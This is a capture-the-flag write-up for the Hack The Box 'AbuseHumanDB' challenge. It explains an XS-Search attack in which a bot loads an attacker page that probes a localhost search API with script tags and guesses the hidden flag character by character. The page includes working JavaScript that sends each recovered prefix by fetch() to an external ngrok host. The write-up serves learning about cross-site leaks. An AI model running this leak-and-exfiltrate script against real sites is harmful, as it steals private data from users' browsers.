# Hack the box - AbuseHumanDB ![](https://hackmd.io/_uploads/Hyn-BK9gT.png) ```mysql= INSERT INTO userEntries (title, url, approved) VALUES ("Back The Hox :: Cyber Catastrophe Propaganda CTF against Aliens", "https://ctf.backthehox.ew/ctf/82", 1); INSERT INTO userEntries (title, url, approved) VALUES ("Drunk Alien Song | Patlamaya Devam (official video)", "https://www.youtune.com/watch?v=jPPT7TcFmAk", 1); INSERT INTO userEntries (title, url, approved) VALUES ("Mars Attacks! Earth is invaded by Martians with unbeatable weapons and a cruel sense of humor.", "https://www.imbd.com/title/tt0116996/", 1); INSERT INTO userEntries (title, url, approved) VALUES ("Professor Steven Rolling fears aliens could ‘plunder, conquer and colonise’ Earth if we contact them", "https://www.thebun.co.uk/tech/4119382/professor-steven-rolling-fears-aliens-could-plunder-conquer-and-colonise-earth-if-we-contact-them/", 1); INSERT INTO userEntries (title, url, approved) VALUES ("HTB{f4k3_fl4g_f0r_t3st1ng}","https://app.backthehox.ew/users/107", 0); ``` We can see that the flag is in the database, but we cant perform SQL injection because SQL query is using parameterized query. ```javascript= router.get('/api/entries/search', (req, res) => { if(req.query.q) { const query = `${req.query.q}%`; return db.getEntry(query, isLocalhost(req)) .then(entries => { if(entries.length == 0) return res.status(404).send(response('Your search did not yield any results!')); res.json(entries); }) .catch(() => res.send(response('Something went wrong! Please try again!'))); } return res.status(403).json(response('Missing required parameters!')); }); ``` In this route, if we supply a title value to `q` parameter, it will search through the database, and then return the data back. If the database return nothing, it will return 404 status code, else it will return data ![](https://hackmd.io/_uploads/HJbRUt5x6.png) ![](https://hackmd.io/_uploads/B19ALK9eT.png) But it just return a post which is approved, which is public. To read the flag, we have to be in localhost. ```javascript= return db.getEntry(query, isLocalhost(req) ``` Also we have a bot that when we supply a URL, it will visit, so to solve this challenge, we will exploit `XS-Search` Now testing if we have a connect back or not. I will host a server in my PC. ```javascript= <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Leakkkkk</title> </head> <body> <script> let flag="HTB" let url s=document.createElement("script"); s.src="http://127.0.0.1:1337/api/entries/search?q="+flag; s.onload = () => location.href= "http://2b7c-27-69-253-13.ngrok-free.app/?success"; s.onerror = () => location.href= "http://2b7c-27-69-253-13.ngrok-free.app/?error"; document.body.appendChild(s); </script> </body> </html> ``` ![](https://hackmd.io/_uploads/S1ck9K5la.png) We see that we have the success message prompt back. So from now we can bruteforce character ```javascript= <script> let flag="HTB{5" let url s=document.createElement("script"); s.src="http://127.0.0.1:1337/api/entries/search?q="+flag; s.onload = () => location.href= "http://2b7c-27-69-253-13.ngrok-free.app/?flag="+flag; s.error = () => location.href= "http://2b7c-27-69-253-13.ngrok-free.app/?error"; document.body.appendChild(s); </script> ``` ![](https://hackmd.io/_uploads/HyaMsF9gT.png) Here is the bruteforce script ```java= <script> let flag= "HTB{"; let character = "}0123456789abcdefghijklmnopqrstuvwxyz!#$@&+()*+,-_"; let index=0; function searchFlag(){ let c = character[index]; let s = document.createElement("script"); s.src="http://127.0.0.1:1337/api/entries/search?q="+encodeURIComponent(flag+c); s.onload = () =>{ flag+=c; index=0; fetch("https://51cc-27-69-253-13.ngrok-free.app/?flag="+encodeURIComponent(flag)); searchFlag(); } s.onerror = () => { index++; searchFlag(); } document.body.appendChild(s); } searchFlag(); </script> ``` ![](https://hackmd.io/_uploads/SykgVs9lp.png) Flag: `HTB{5w33t_ali3ndr3n_0f_min3!}`